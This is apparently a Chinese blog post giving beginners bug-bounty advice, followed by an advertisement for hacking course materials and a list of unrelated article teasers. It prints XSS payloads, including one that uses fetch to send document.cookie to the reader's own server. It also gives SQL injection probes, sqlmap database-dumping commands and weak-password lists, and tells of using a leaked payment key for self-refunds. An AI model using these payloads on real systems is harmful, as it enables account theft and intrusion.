三个月拿下5个CVE:我的漏洞挖掘实战经验,收藏这篇少走半年弯路 📅 发布时间:2026/7/8 12:55:22 👁️ 浏览次数: 三个月拿下5个CVE我的漏洞挖掘实战经验收藏这篇少走半年弯路文章作者从零基础起步三个月内提交17个漏洞并获得5个CVE编号分享了漏洞挖掘的实用经验。详细解答了收入潜力、编程门槛和合法性问题推荐五大易上手漏洞类型逻辑漏洞、信息泄露、弱口令、XSS、SQL注入提供免费工具清单、工作流程和报告写作技巧。强调正确方法、持续练习和好奇心是成功关键提醒读者必须在授权范围内测试遵守网络安全法律法规。导语 三个月前我还是个小白现在已提交17个漏洞拿到5个CVE编号。这不是天赋是方法。一、先回答你最关心的3个问题Q1漏洞挖掘能赚钱吗能。但别指望一夜暴富。真实收入参考新手期0-3个月几百到几千/月成长期3-12个月几千到几万/月高手期1年几万到几十万/月我目前处于成长期上个月收入1.2万Q2需要会编程吗不需要。我大学是文科代码只懂皮毛。 但我会用工具、看逻辑、改参数、写报告。这行最值钱的不是写代码能力 而是发现问题的眼睛。Q3违法吗在授权范围内测试 合法 未经授权测试 违法本文只教你在合法渠道挖洞漏洞众测平台补天、漏洞盒子企业SRC安全应急响应中心开源项目GitHub上明确欢迎安全测试的二、我的第一个漏洞从0到1的全过程时间2025年12月15日平台某在线教育网站漏洞类型水平越权奖金800元 1个CVE发现过程Step 1注册账号正常浏览10分钟 └── 发现个人中心URL/student/10086/profile Step 2改数字测试1分钟 └── 改成 /student/10087/profile └── 看到了别人的姓名、手机号、课程记录 Step 3验证影响范围10分钟 └── 写了脚本批量测试发现影响10万用户 Step 4写报告提交30分钟 └── 按平台模板填写附截图和复现视频 Step 5等待审核3天 └── 厂商确认漏洞发放奖金和CVE编号关键心得这个漏洞没有任何技术含量就是改了个数字。 但90%的人不会想到去改那个数字。三、新手装备清单全部免费工具用途下载地址Burp Suite Community抓包、改参数、重放请求portswigger.netChrome浏览器F12开发者工具看源码、调接口自带Wappalyzer插件识别网站技术栈Chrome商店HackBar插件快速构造测试payloadChrome商店安装Burp的坑我踩过1. 必须装CA证书否则HTTPS抓不到包 2. 证书装完后要重启浏览器 3. 代理端口默认8080如果被占用要改一句话总结工具只是放大器核心是你的测试思路。四、新手最该学的5类漏洞按易上手排序 第1名逻辑漏洞推荐新手优先为什么先学它不需要懂代码不需要复杂工具只需要不按套路出牌的思维实战案例支付逻辑漏洞某电商网站下单时抓包看到 price199quantity1 测试思路 1. 把price改成1 → 1元买199元商品 ✓ 成功 2. 把quantity改成-1 → 负数购买 ✓ 成功 3. 并发请求 → 重复下单 ✓ 成功核心心法开发者假设用户会正常使用你要假设用户是坏人。 第2名敏感信息泄露去哪找1. 页面源代码CtrlU 2. JS文件F12 → Sources 3. 接口返回F12 → Network → Response 4. 特殊地址 - /.git/config 源码泄露 - /.env 配置文件泄露 - /api/swagger-ui.html 接口文档暴露我挖到的一个真实案例某网站前端JS里发现 const API_KEY sk-live-xxxxxxxxxxxxxxxx; const API_SECRET xxxxxxxxxxxxxxxxxxxxxx; 这是支付接口的密钥。 用这两个值可以直接调用支付API给自己退款。 第3名弱口令/爆破不是无脑跑字典而是有策略常见弱口令TOP10admin/admin admin/123456 admin/admin123 test/test root/root针对性构造公司名缩写 年份alibaba2024、 Tencent2024 系统名 123oa123、erp123、crm123工具Burp Intruder1. 抓登录请求发送到Intruder 2. 标记用户名和密码位置 3. 加载字典设置线程 4. 开始爆破看返回长度差异注意控制频率别打挂了网站。第4名XSS跨站脚本最简单的测试在搜索框、评论区、用户名处输入 scriptalert(1)/script 如果弹出1 → 存在XSS进阶payloadimgsrcxonerroralert(document.cookie) svg onloadfetch(http://你的服务器/?cdocument.cookie)危害偷Cookie → 冒充登录钓鱼 → 诱导输入密码键盘记录 → 记录输入第5名SQL注入快速检测在参数后加单引号 ?id1 → 页面报错 ?id1 -- → 页面正常 加and条件 ?id1 and 11 → 正常 ?id1 and 12 → 异常工具辅助SQLMap# 检测 sqlmap -uhttp://target.com/news?id1--batch # 爆库 sqlmap -uhttp://target.com/news?id1--dbs提醒先理解原理再用工具否则只是脚本小子。五、我的每日工作流程可直接复制上午2小时 ├── 信息收集找3个新目标 ├── 子域名、目录、技术栈 └── 记录到Excel 下午3小时 ├── 选1个目标深度测试 ├── 按checklist逐个功能点过 └── 发现可疑点深入挖掘 晚上1小时 ├── 整理今日发现 ├── 写报告或继续验证 └── 社区学习看别人的报告Checklist每个功能点必查越权访问改ID参数敏感信息泄露看源码、接口返回XSS输入六、如何写出被认可的漏洞报告好报告 清晰复现 明确危害 可行建议模板【标题】XX网站XX接口存在XX漏洞 【类型】逻辑漏洞-水平越权 【等级】高危 【描述】 XX接口未校验用户权限通过修改XX参数可XX 导致XX后果。 【复现步骤】 1. 登录账号A访问XX页面 2. 抓包得到请求GET /api/xx?id1 3. 修改id参数为2重放请求 4. 成功获取账号B的XX信息 【Payload】 附完整请求包 【危害证明】 附截图/视频 【修复建议】 1. 接口增加权限校验 2. ID使用随机字符串 3. 增加访问日志七、给新手的10条血泪建议从逻辑漏洞开始—— 最快有正反馈做好笔记—— 我建了Notion数据库记录所有测试过的点多看报告—— 补天、HackerOne公开报告是最好教材加入社区—— T00ls、先知、看雪有问题随时问别忽视低危—— 信息泄露往往是高危入口学会看JS—— 前端藏着大量接口和密钥保持耐心—— 我第一个月只挖到1个漏洞别贪心—— 先求有再求多再求高遵守规则—— unauthorized测试 违法享受过程—— 挖洞是技术运气的游戏八、资源推荐学习资料《Web安全深度剖析》入门圣经《白帽子讲Web安全》进阶PortSwigger Web Security Academy免费实战社区/平台补天、漏洞盒子国内众测HackerOne、Bugcrowd国际平台T00ls、先知社区、看雪论坛工具清单Burp Suite抓包神器SQLMapSQL注入检测Nmap端口扫描Subfinder子域名收集九、写在最后三个月前我在知乎看到一句话“漏洞挖掘是少数普通人可以通过努力达到专业水准的网络安全领域。”现在我信了。不需要名校背景不需要大厂履历不需要天赋异禀。只需要正确的方法 持续的练习 一点点好奇心。我的第18个漏洞正在挖掘中你的第一个呢 本期福利关注后回复「工具包」领取Burp Suite汉化版 常用插件渗透测试常用字典用户名/密码/目录我整理的100个漏洞案例库下期预告《从CVE到万元奖金我的5个经典漏洞复盘》⚠️ 法律声明与责任限制1. 法律合规本文所述技术仅供网络安全教育和防御目的使用。读者应严格遵守《中华人民共和国网络安全法》《中华人民共和国数据安全法》《中华人民共和国个人信息保护法》等相关法律法规。2. 禁止行为严禁将本文所述技术用于以下行为未经授权访问计算机信息系统窃取、泄露、篡改、毁损他人数据干扰他人网络正常功能制作、传播计算机病毒等破坏性程序其他危害网络安全的行为3. 测试授权任何安全测试必须获得目标系统的明确书面授权。未经授权的测试可能构成非法侵入计算机信息系统罪刑法第285条破坏计算机信息系统罪刑法第286条侵犯公民个人信息罪刑法第253条之一4. 漏洞披露发现安全漏洞后应通过以下渠道负责任地披露厂商官方安全响应中心SRC国家信息安全漏洞共享平台CNVD国家信息安全漏洞库CNNVDCommon Vulnerabilities and ExposuresCVE文章来自网上侵权请联系博主题外话黑客/网络安全学习路线今天只要你给我的文章点赞我私藏的网安学习资料一样免费共享给你们来看看有哪些东西。网络安全学习资源分享:下面给大家分享一份2025最新版的网络安全学习路线资料帮助新人小白更系统、更快速的学习黑客技术一、2025最新网络安全学习路线一个明确的学习路线可以帮助新人了解从哪里开始按照什么顺序学习以及需要掌握哪些知识点。对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图学习规划。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。读者福利 |CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击我们把学习路线分成L1到L4四个阶段一步步带你从入门到进阶从理论到实战。L1级别:网络安全的基础入门L1阶段我们会去了解计算机网络的基础知识以及网络安全在行业的应用和分析学习理解安全基础的核心原理关键技术以及PHP编程基础通过证书考试可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。L2级别网络安全的技术进阶L2阶段我们会去学习渗透测试包括情报收集、弱口令与口令爆破以及各大类型漏洞还有漏洞挖掘和安全检查项目可参加CISP-PTE证书考试。L3级别网络安全的高阶提升L3阶段我们会去学习反序列漏洞、RCE漏洞也会学习到内网渗透实战、靶场实战和技术提取技术系统学习Python编程和实战。参加CISP-PTE考试。L4级别网络安全的项目实战L4阶段我们会更加深入进行实战训练包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握而L3 L4更多的是通过项目实战来掌握核心技术针对以上网安的学习路线我们也整理了对应的学习视频教程和配套的学习资料。二、技术文档和经典PDF书籍书籍和学习文档资料是学习网络安全过程中必不可少的我自己整理技术文档包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点电子书也有200多本书籍含电子版PDF三、网络安全视频教程对于很多自学或者没有基础的同学来说书籍这些纯文字类的学习教材会觉得比较晦涩难以理解因此我们提供了丰富的网安视频教程以动态、形象的方式展示技术概念帮助你更快、更轻松地掌握核心知识。网上虽然也有很多的学习资源但基本上都残缺不全的这是我自己录的网安视频教程上面路线图的每一个知识点我都有配套的视频讲解。四、网络安全护网行动/CTF比赛学以致用当你的理论知识积累到一定程度就需要通过项目实战在实际操作中检验和巩固你所学到的知识同时为你找工作和职业发展打下坚实的基础。五、网络安全工具包、面试题和源码“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等感兴趣的同学不容错过。面试不仅是技术的较量更需要充分的准备。在你已经掌握了技术之后就需要开始准备面试我们将提供精心整理的网安面试题库涵盖当前面试中可能遇到的各种技术问题让你在面试中游刃有余。如果你是要找网安方面的工作它们绝对能帮你大忙。这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的如果大家有好的题目或者好的见解欢迎分享。参考解析深信服官网、奇安信官网、Freebuf、csdn等内容特点条理清晰含图像化表示更加易懂。内容概要包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…**读者福利 |**CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击
MMC整流器Matlab实战:从冒泡排序到环流抑制的硬核解析 MMC整流器(Matlab),技术文档 1.MMC工作在整流侧,子模块个数N=18,直流侧电压Udc=25.2kV,交流侧电压6.6kV 2.控制器采用双闭环控制,外环控制直流电压,采用PI调节… 2026/7/8 12:02:59
突破付费内容限制的解决方案:Bypass Paywalls Clean 应用指南 突破付费内容限制的解决方案:Bypass Paywalls Clean 应用指南 【免费下载链接】bypass-paywalls-chrome-clean 项目地址: https://gitcode.com/GitHub_Trending/by/bypass-paywalls-chrome-clean 如何在不增加订阅成本的前提下,获取专业媒体的深… 2026/5/17 12:09:03
降本增效必看:企业管理者如何通过部署Agent降低人力成本? 企业管理者如何通过部署Agent降低人力成本?这是当下几乎所有企业管理者都在反复思考的核心问题。当下的商业环境里,人力成本早已成为企业最大的刚性支出之一:根据中国企业联合会发布的2024年企业经营数据,国内规模以上企业人均人力… 2026/5/17 12:09:01
计算机毕业设计之基于SSM框架的医院信息管理系统设计与实现 在网络计算机快速发展的时代,信息管理系统已成为社会现代化发展中有着重要的作用。随着信息管理系统的不断增加,传统的人工管理易出错,且双方缺少信息关联和沟通。因此,建立一个依托互联网的医院信息管理系统来建立一个交流和沟通的渠道势在必… 2026/7/9 8:40:21
RAG已死?不!这才是企业知识库的“续命神针”! RAG在网上已经死过很多遍了,谁用谁Low,但是实际上很多的企业知识库仍然在使用,并且依然是主流选择方案。 但是,这些论调会把很多人带偏,尤其是对知识库和RAG没有体系化认知的同学。 这里我们首先要理解一个问题&#x… 2026/7/9 8:40:21
小白程序员必看:收藏这份Agent开发七层架构指南,让你的AI智能体稳如老狗! 本文介绍了ETCLOVG七层分类架构,该架构为Agent开发提供了从执行环境到安全治理的完整解决方案。文章详细解析了每一层的核心职责、关键指标及典型实例,帮助开发者理解并应用这一框架,确保Agent在生产环境中稳定运行。 最近Agent开发挺火的&am… 2026/7/9 8:38:20
经营闭环不是口号:智能BI如何打通‘洞察-决策-执行-复盘‘四段路 导语 先做一个概念澄清:很多企业把"经营闭环"等同于"搭一套数据看板 每月开一次经营分析会"。看板负责呈现,会议负责讨论,看起来数据、决策、行动都齐了。但如果拆开看,你会发现这中间缺了三段路——看板到决… 2026/7/9 8:36:20
DCMM数据管理能力成熟度:企业数据资产管理的“及格线“到底怎么算 数据都存了,但到底管得怎么样?很多企业买了服务器、上了数据库、业务系统跑得飞起,结果一问到"你们的数据质量怎么样?""数据资产值多少钱?""哪些数据在流转?"——哑火了。这… 2026/7/9 8:34:19
现有数字人方案的“交互性“困境:从底层逻辑说起 延迟:超过人类对话容忍阈值人类对话有一个隐性规则:200ms 是流畅对话的临界点。超过这个时间,对话感就会断裂,你会明显感觉"对面是个机器"。而现有数字人的典型链路是这样的:用户语音 → ASR语音识别 → LLM… 2026/7/9 8:34:19
机器视觉与PLC集成:轮毂缺陷检测与字符识别误差控制在0.2mm内 机器视觉与PLC集成:轮毂缺陷检测与字符识别误差控制在0.2mm内的技术实现轮毂作为汽车关键零部件,其表面质量直接影响行车安全与美观。传统人工检测效率低且易漏检,而采用机器视觉与PLC集成方案可实现微米级精度检测。本文将深入解析高精度视觉… 2026/7/9 0:01:04
GBase 8a vs MySQL 8.0:ALTER TABLE语法与限制的5点关键差异对比 GBase 8a与MySQL 8.0:ALTER TABLE语法差异深度解析与实战指南1. 两种数据库的ALTER TABLE能力全景对比在数据库架构设计和运维过程中,表结构变更(DDL操作)是不可避免的需求。GBase 8a作为国产分析型数据库代表,与开源M… 2026/7/9 0:03:06
【大数据毕业设计】基于多源旅游数据的景区热度分析与推荐系统的设计与实现 基于 Django 的旅游偏好挖掘与景区推荐系统(源码+文档+远程调试,全bao定制等) 博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am… 2026/7/9 0:05:09
6个月转型AI工程师:实战路径与核心技能 1. 项目概述:6个月转型AI工程师的可行性路径在2023年大模型技术爆发的背景下,AI工程师岗位需求同比增长217%(LinkedIn数据)。不同于传统算法工程师需要3-5年培养周期,现代AI工程师更侧重工程化落地能力。我在硅谷科技公… 2026/7/7 11:26:57
TPAFE0808与PIC18F87K22的多通道信号采集方案 1. 项目背景与核心需求在工业自动化、医疗设备和科研仪器等领域,多通道信号采集与系统监测是基础且关键的技术需求。传统方案往往面临通道数量不足、信号调理复杂、系统集成度低等问题。TPAFE0808作为一款8通道模拟前端芯片,与PIC18F87K22微控制器的组合… 2026/7/8 20:15:17
STC3115与PIC18LF26K80构建高精度电池管理系统 1. STC3115与PIC18LF26K80在电池管理系统中的核心价值在现代电子设备中,电池管理系统(BMS)的重要性不亚于设备的核心处理器。STC3115作为一款高精度电池电量监测IC,与PIC18LF26K80微控制器的组合,构成了一个既能精确监控又能智能管理的完整解… 2026/7/8 14:25:08